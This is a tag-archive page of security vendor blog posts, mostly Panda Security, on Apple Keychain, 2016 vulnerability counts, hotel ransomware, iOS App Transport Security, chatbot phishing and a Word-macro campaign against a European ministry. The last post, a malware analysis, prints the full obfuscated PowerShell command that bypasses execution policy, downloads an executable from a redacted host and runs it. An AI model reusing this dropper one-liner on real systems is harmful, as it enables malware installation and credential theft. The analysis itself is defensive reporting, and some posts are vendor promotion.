Tag Archives: featured1

Panda Security

Keychain, Apple’s Cloud-Based Tool That Safeguards Your Data

Leave a comment

Safeguarding your company’s confidential information, in many cases, calls for having your employees create and properly manage a series of passwords. Not only should they choose complex credentials, but they should also vary among themselves. And they definitely should not be saved in easily accessible places, like a text document.

Password managers come in handy in this task that is so indispensable to corporate security. For their part, companies that have Apple devices for their employees have the Keychain as an ally: it is a password manager in the cloud that makes things really easy when defending corporate privacy via robust password selection.

Activating this tool is simple: just go to iCloud Settings from an iPhone or an iPad and activate the Keychain option. From a Mac you go to the “System Preferences” menu.

Once activated, all the passwords used by the employee will be stored in iCloud, with its own encryption. Once uploaded to the cloud, it will be possible to use those credentials on all devices that are synchronized and authorized to do so.

However, the Apple Keychain is much more than just a place to store passwords in the cloud. In fact, it allows users to completely forget about the clutter of having several passwords since, when they sign up for the service, the keychain suggests complex and distinct options to those already used and automatically saves it. No need to commit anything to memory.

It is also possible to store credit card data and certificates to sign documents digitally. Thus, Apple encryption and its cloud service are one hundred percent responsible for security on the platforms used by employees.

By combining this tool with the right protection to avoid threats, your company’s confidential information will be safer. It makes sure that your passwords are secure and that they will not be stored remotely in any place. And those who want to spice up their passwords can still edit them (or delete old ones) to make them even more complex. When corporate security is at stake, it can never hurt to add extra layers of protection.

The post Keychain, Apple’s Cloud-Based Tool That Safeguards Your Data appeared first on Panda Security Mediacenter.

Panda Security

Android and Linux, the Technologies with the Most Security Holes in 2016

Leave a comment

The latest version of Google’s mobile operating system, Android Nougat, has quite a few security improvements over older versions and, in fact, its arrival on the market is more than necessary. Not for nothing,  Android has managed to win the dubious honor of being the product with the most security vulnerabilities discovered in 2016.

According to the ranking carried out by the CVE Details digital platform, more than five hundred holes in Google’s mobile operating system over the past year have been found. To be exact, there were 523 security errors that put its more than 1.5 billion users at risk.

So Android has overtaken Apple. In 2015, the operating system of Apple computers, Mac OS X, had the greatest amount of vulnerabilities to their credit. However, this year Cupertino seems to have done their homework. They’ve gone from leading last year’s ranking with more than 400 vulnerabilities to closing out 2016 at number eleven on the list, with little more than 200 holes identified throughout the year.

So it turns out having a mobile fleet in your company comprised of Android phones can pose a real risk if you don’t have the right protection. In addition, it is important to update the terminal with the latest version possible, which ultimately will depend on the manufacturer (some are quicker than others, and all are abandoning their older models completely). It’s no wonder there are more than 300 million Android devices that no longer even receive security patches.

Two Linux distributers, Debian and Ubuntu, are the technological products that join Android on the podium of the most error-riddled software. Throughout 2016 over 300 vulnerabilities were found in Debian, while the other distributer came in third place with almost 280 errors.

Choosing your company’s technological tools can be key to preserving both your safety and that of your customers. However, not many are able to escape vulnerabilities: operating systems like Windows 10, browsers such as Google Chrome, or software giants like Adobe are also among the twenty products with the most vulnerabilities discovered in 2016.

The post Android and Linux, the Technologies with the Most Security Holes in 2016 appeared first on Panda Security Mediacenter.

Panda Security

When Ransomware Comes Knocking at Your Door… or Locks it

Leave a comment

A lot of things can go wrong on your holidays, like losing luggage or missing a flight, forgetting your travel documents or getting sick at the worst possible time. But have you ever been locked out of your hotel room because of a cyberattack?

That’s just what happened to guests at a luxury hotel in Austria when they were left stranded outside of their rooms after a ransomware attack that overrode electronic key systems.

This concept, which can be summed up as “if you don’t pay, your guests won’t be able to get into their rooms”, underscores a strategy shift in ransomware. Instead of directly attacking the hotel chain directly, cybercriminals are looking to increase profitability by compromising the well-being of paying customers.

The Evolution of Cyberattacks against Hotels

Infected computers and POS systems, credit card theft, access to confidential information… in the age of the Internet of Things and smart homes, these attacks are becoming commonplace or even antiquated.

Clearly the attacks that this industry has been experiencing are not something casual or fleeting. Behind them lies a real economic interest and a preoccupation with stealthy operations. The hotel sector has become a major target for organized cybercriminals in possession of malware specifically designed to harm its running smoothly, not only in payment systems, but also by sealing off access to your room, turning lights on and off, or locking your blinds.

This is, undoubtedly, a worrisome situation that could cause significant harm not only on an economic level, but also a PR level, sowing fear among clientele.

Taking appropriate measures is a matter of necessity. Hotels are being forced to reinforce the security of their networks, devices, and systems to avoid becoming victims to this kind of attack. But not all protection systems offer the same level of security, nor are they all valid for any kind of business environment.

Traditional antiviruses are not effective against these attacks, since they are specifically tailored to the victim and are cleaned of all recognizable malware signatures before being launched. Current anti-malware solutions use proactive technology that rely on these signatures to catch malware, rendering them useless against attacks that actively avoid incorporating traits recognizable to these solutions.  That’s why it is vital to have advanced cybersecurity protection like Adaptive Defense 360, one that can activate protection systems before the malware is even able to run.

The post When Ransomware Comes Knocking at Your Door… or Locks it appeared first on Panda Security Mediacenter.

Avast

Is WhatsApp safe to use or does it have a backdoor?

Leave a comment

Last week an article from The Guardian stated that a backdoor within the end-to-end encryption of popular messaging app WhatsApp could be used by governments to snoop on users. The author “warned it could be used by government agencies as a backdoor to snoop on users who believe their messages to be secure.” This caused quite a stir in security circles, which resulted in a group of cryptography and security experts calling for a retraction and an apology for misleading claims.

Panda Security

Only 3% of the Apps on Your Company iPhones are Secure

Leave a comment

Since the 1st of January, the iPhones in your mobile device fleet are even more secure. Or, at least, they should be based on Apple’s most recent requirements for developers. With the beginning of the new year, all apps that haven’t incorporated the App Transport Security (ATS) function will be unable to offer updates through the official store.

With the ATS system, Apple is attempting to force developers to offer apps that manage data more securely. This new characteristic requires, among other things, all web connections from the app to use an HTTPS protocol.

That way, the information will travel exclusively on an encrypted network, avoiding the most common risks. Paired up with the right protection, this measure taken by Apple could turn iPhones into one of the best options for company mobile devices.

Starting January 1, the iPhone that make up your company’s mobile fleet are even safer devices. Or, at least, they should be based on Apple’s latest demand for application developers. With the start of the new year, all those who have not incorporated their App Transport Security (ATS) tools will not be able to offer updates

But it’s not as simple as it may seem on the surface. For now, developers are not quite dancing Apple’s tune. In fact, a recent study has revealed that only 3% of the 200 most downloaded apps for iOS have already implemented ATS.

This figure is disconcerting. Some other conclusions of the study are also worrisome: about 83% of these 200 popular applications have completely disabled ATS and 55% still allow the use of unencrypted HTTP connections.

Moreover, among the popular apps that have not yet embraced the Apple system are some corporate tools that are common in company mobile phones, such as Microsoft Office products, Facebook and even WhatsApp.

The truth is that Apple is not cracking down too hard on developers in the application of these new rules. In fact, before January 1, developers were able to request justified exceptions that exempt them from adhering to ATS.

Since the beginning of the year, users have been able to continue to use these applications that are frankly not as safe as they should be. The only penalty imposed is to be banned from updating your app until you comply with ATS.

Accordingly, your employees should look for alternative applications that have adopted Apple’s latest security feature. Otherwise, they will not only be using unencrypted connections to deal with corporate data, but will also have their mobile devices plagued with un-updateable programs unable to incorporate changes against future vulnerabilities.

The post Only 3% of the Apps on Your Company iPhones are Secure appeared first on Panda Security Mediacenter.

Panda Security

Chatbots Take Businesses By Storm

Leave a comment

They’re not human, but they sure seem like they are when we chat with them. Chatbots will become virtual butlers of many companies thanks to their ability to process natural language. Companies like Facebook are promoting their use. For the last few months, Facebook has allowed third parties to create bots for its Messenger app. Slack, Telegram, and Line have also opened their API (the window that allows other applications to communicate with each other) to make room for bots.

Companies can also use these intermediaries to increase the productivity of their workers. For example, Howdy allows you to organize meetings and manage the team without leaving the famous Slack corporate communication platform.

They can also be a new customer service channel, either by integrating them in one of these platforms or including them in their own corporate website. In the United States, Uber already allows you to request a car through Facebook Messenger

But let’s take a step back for a moment. Although the bot trend is going to become a multi-million dollar business, the truth is that they can also be a new way for cybercriminals to commit their misdeeds. In fact, they can become a weapon in the service of phishing, one that is more dangerous than traditional emails.

After all, we are already well aware that when we receive an email we have to verify the source. But if a chatbot starts talking to one of our employees or one of our clients, usurping your company’s name, it will be a lot easier for users to fall into their traps.

A New Tool for Phishing

If the person on the other end of a conversation with a chatbot has no way of knowing whether or not they’re speaking to a human, it’s easier to get a victim to click a link after several minutes of casual conversation. By doing so, the user can be redirected to a fraudulent website that uses social engineering techniques to requests confidential data.

In fact, cyberattackers may not even have to come up with that fraudulent website. If they just want to get some private information from a user, they may simply ask for it.

Another option is that the link, instead of serving as a con in itself, directs employees to a webpage that automatically downloads malware — a particularly serious situation if the victim is using the company’s computer. It is advisable to be well protected with an advanced cybersecurity solution.

The security of the channel itself is another factor to take into account when using a chatbot. Facebook announced a few months ago the implementation of end-to-end encryption in Facebook Messenger to prevent third parties from having access to a conversation.

However, other platforms to integrate these virtual butlers may not use that method. Care must be taken with the kind of information we provide to these intermediaries. The fact that they sound human can cause us to end up giving them too much information.

Undoubtedly, chatbots will improve the way we work and the way we communicate with our customers. But its popularization also brings with it new threats in the area of cybersecurity.

The post Chatbots Take Businesses By Storm appeared first on Panda Security Mediacenter.

Panda Security

Malware Capable of Paralyzing an Entire Ministry Neutralized

Leave a comment

Cyberthreats are a constant risk and affect public administrations significantly. So much so that they have become a powerful instrument of aggression against public entities and citizens. They can lead to a serious deterioration in the quality of service, and also, above all, to data leaks concerning everything from personal information to state secrets.

The combination of new technologies and the increase in the complexity of attacks, as well as the professionalization of cybercriminals, is highly dangerous. These are trends that we are predicting for 2017.

Last December, a large-scale spam campaign spanning more than ten countries was carried out, and specifically targeted a major European ministry. The attack, via phishing, was highly advanced and combined social engineering tactics with a powerful Trojan.

The attack is sent by email with an attached Word document. At first, we suspected that it was a targeted attack, since the message came, supposedly, from a healthcare company and the recipient was an employee of the Ministry of Health in a European country.

The present analysis describes the technical features of the harmful code found in the macro of the Word document. The goal of the macro was to download and run another malicious component.

Characteristics

Below are shown a few static properties of the analyzed files.

The hash of the Word document is the following:

MD5:  B480B7EFE5E822BD3C3C90D818502068

SHA1:  861ae1beb98704f121e28e57b429972be0410930

According to the document’s metadata, the creation date was 2016-12-19. The malicous code’s signature, downloaded by Word, is the following:

MD5:  3ea61e934c4fb7421087f10cacb14832

SHA1:  bffb40c2520e923c7174bbc52767b3b87f7364a9


 Implementation 

1.  Infection Vectors

The Word document gets to the victim’s computer by way of a spam email coming from a healthcare company. The text tricks the recipient into beleiving that the content is protected and needs to run the macro in order to gain access to it.

Screen cap of the actual message

 

According to the data recovered by Panda Security’s Collective Intelligence, this spam campaign took place on December 19, 2016 and affected several countries.

The majority of recipients attempted to open the Word document the same day they received it, December 19.

 

Map of countries affected by the spam campaign

 

2. Interactions with the infected system

The basic function of the macro consists in downloading and running another malicious code from a URL embedded in the macro itself.

Both the macro and its chains are obfuscated. Also, the macro is designed to run immediately upon being opened.

Part of the obfuscated code contained in the macro

Part of the obfuscated code contained in the macro

 

Once the macro is running, the Word doc runs the following command in the system:

cmd.exe /c pOWeRsHELL.EXe   -eXecUTIONpolICy   BYPAss  -noPrOfIlE -winDowsTyle    hidDEN (NeW-oBjECt    sYstEm.NeT.webcLiENt).DOWNloAdFILE(‘http://xxxxxxxxxxxx.com/13obCpHRxA1t3rbMpzh7iy1awHVm1MzNTX.exe’,’C:Users????AppDataRoaming.Exe’);STaRt-PRoCESS ‘C:Users????AppDataRoaming.eXe’

The system symbol (cmd.exe) runs the powershell with two embedded commands going through parameters:

  1. The first powershell command downloads en EXE from this URL (in %APPDATA%.exe): http://xxxxxxxx.com/13obCpHRxA1t3rbMpzh7iy1awHVm1MzNTX.exe
  2. This generates a file in the root of APPDATA.
  3. The next powershell command (Start-process) is used to run the downloaded file.

Thanks to the data obtained by the Intelligence Collective at Panda Security, we know that the last malicious code to be distributed by this campaign is a variant of the Dyreza family. Panda’s clients were protected proactively, without need of signatures or updates.

The purpose of the malicious code is to steal credentials from browsers and add the compromised machine to bot network. It then waits for commands from the Command & Control Server. These commands come from the cybercriminals that operate it, and is able to download further new malware and carry out all kinds of malicious actions.

Digitization in Public Administration leads to the exponential growth of the creation, storage and management of huge quantities of confidential data — data that does not allow for a single oversight.

The post Malware Capable of Paralyzing an Entire Ministry Neutralized appeared first on Panda Security Mediacenter.